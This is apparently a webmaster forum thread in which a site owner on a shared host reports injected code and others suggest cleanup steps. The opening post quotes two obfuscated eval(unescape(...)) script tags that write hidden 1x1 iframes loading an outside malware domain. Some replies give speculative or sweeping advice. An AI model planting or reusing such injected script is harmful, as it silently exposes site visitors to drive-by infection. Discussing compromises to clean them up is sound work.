so those viruses on my tgp is back... any one else?
 

<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77 %6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%30%20%77%6 9%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c% 2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

hosted at webair, i have 0 scripts

any one else?:Oh crap

:eyecrazy:eek7:eek2

Let me guess cpanel?

i doubt it , webair doesnt use cpanel by default i don't think

thanks for the heads up...checked some sites
and i got the same code

files modified on nov19th =\

Your server got hacked, a good idea would be to check your sites files for recently changed or newly added files, you can alos do that through FTP.

And through SSH you could take a look what recently happend on your server with the "last" command.

Oh and update your box :)

Webair has problems....

use this encoder/decoder:
http://d21c.com/sookietex/ASCII2HEX.html

here is is decoded:
I fucked it up a little but you get the picture...

Delete all php files from your server and then start cleaning up the mess with a code that represses.

i had this problem, got rid of it recently and im still ok at the moment, im with webair too.

I get them on ocassion...

I've cleaned up, changed passwords, removed all php, and still have them show up now and then...

The php I did use were just single file parser scripts..

Anyone know of a way to restrict ftp access to a given ip address?

firewall

wrong ...... another guess?

what do you guys mean "remove all php files" ? how it this related to php?

Are you on a dedicated box?

I hope webair are looking into this problem with you, because there might be some weird/illegal activities going onright now...

http://www.honeynet.org.cn/downloads...etworks_EC.htm

I'd guess the person who did it used a proxy, but search google for "IPTables" or "hosts.deny"

bbbbbbbump

that sucks for you

Yeah, webair has been beginning to suck. Who is the webair replacement?

yeah not good.. good luck with resolving this...

You should ask them if they have the lastest version of SSH installed on their servers. There is a version of SSH that could be flooded and allow a hacker to login to the server. This was fixed, but if a web host is still using the old version then the problem is there.

Once your server get compromised like this the only 100% fail safe way to get it back is to format it, and make sure your host knows how to firewall it this time. This should never or very rarely happen if the server is being managed properly.:2 cents:

If still not fixed, you have to check which scripts you run on your server and if any of those scripts versions are vulnerable to known exploits.

But does your antivirus detect it when you load your page? If not then it is something way more evil (undetectable Russian rootkit)